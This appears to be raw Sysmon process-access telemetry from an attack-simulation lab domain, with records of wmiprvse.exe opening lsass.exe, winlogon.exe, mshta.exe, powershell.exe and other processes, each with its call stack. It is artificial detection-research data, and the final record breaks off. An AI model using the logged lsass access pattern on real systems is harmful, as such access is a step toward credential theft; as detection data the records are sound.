15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.898{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3206-00000000A301}1108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 